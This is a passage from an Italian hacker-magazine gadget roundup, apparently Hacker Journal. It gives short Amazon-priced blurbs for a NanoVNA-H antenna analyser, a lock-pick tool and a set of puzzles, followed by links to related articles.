Il NavoVNA-H è uno strumento avanzato pensato per ingegneri elettronici, radioamatori e professionisti delle telecomunicazioni. Con un intervallo di misura da 10KHz a 1,5GHz, permette di analizzare con precisione le prestazioni delle antenne, il rapporto d’onda stazionaria (SWR) e i parametri S11/S21. Sfrutta l’estensione delle armoniche dispari del si5351, garantendo misurazioni più accurate e riducendo le interferenze con la schermatura metallica. Dotato di un display touchscreen LCD da 2,8 pollici, è intuitivo e facile da usare. Il metodo TX/RX consente di misurare i parametri completi S11 e S21 con cambio manuale delle porte del ricetrasmettitore, mentre la compatibilità con il software NanoVNA Saver permette di collegarlo al PC per visualizzare, analizzare ed esportare i dati in formato Touchstone (.snp) per simulazioni radio.
Quanto costa: € 66
Dove acquistarlo: su Amazon
LOCKPIC
PER L’APERTURA DI SERRATURE
Il LockPic è un gadget indispensabile per professionisti della sicurezza, esperti di lockpicking e per chi desidera apprendere le tecniche di apertura non distruttiva. È uno strumento avanzato è progettato per sbloccare serrature in modo rapido ed efficiente, senza danneggiarle, rendendolo perfetto per situazioni di emergenza o test di sicurezza. Dotato di una tecnologia di precisione, permette di manipolare i meccanismi interni della serratura con estrema facilità. Il design ergonomico garantisce una presa salda e un utilizzo intuitivo, anche per chi è alle prime armi. Inoltre, grazie alla sua struttura compatta e leggera, può essere trasportato ovunque senza ingombri.
Quanto costa: € 36
Dove acquistarlo: su Amazon
ROMPICAPO QANMUA
SFIDE PER LA MENTE
Una serie di rompicapo perfetta per chi ama mettere alla prova le proprie abilità, offrendo un’esperienza stimolante e coinvolgente. Ogni enigma è progettato per sfidare la mente, stimolare la creatività e affinare il pensiero, rendendo ogni tentativo un’opportunità per migliorare la propria agilità mentale. Ideali per allenare la mente, questi gadget sono un modo divertente e intelligente per trascorrere il tempo, sia da soli che in compagnia. Realizzati con materiali di alta qualità, uniscono estetica e funzionalità, garantendo un’esperienza di gioco piacevole e duratura. La loro costruzione solida li rende adatti sia per adulti che per bambini, offrendo un livello di difficoltà progressivo che consente a chiunque di mettersi alla prova, indipendentemente dall’esperienza. La soluzione ideale per chi è alla ricerca di un passatempo intelligente!
Quanto costa: € 13
Dove acquistarlo: su Amazon
Leggi anche: “Gadget dell’hacker – gennaio“
-
News4 anni fa
Hacker Journal 283
-
News8 anni fa
Abbonati ad Hacker Journal!
-
Articoli3 anni fa
Parrot Security OS: Linux all’italiana- La distro superblindata
-
Articoli4 anni fa
Guida: Come accedere al Dark Web in modo Anonimo
-
Articoli7 anni fa
Superare i firewall
-
News5 anni fa
Le migliori Hacker Girl di tutto il mondo
-
Articoli6 anni fa
Come Scoprire password Wi-Fi con il nuovo attacco su WPA / WPA2
-
News8 anni fa
Accademia Hacker Journal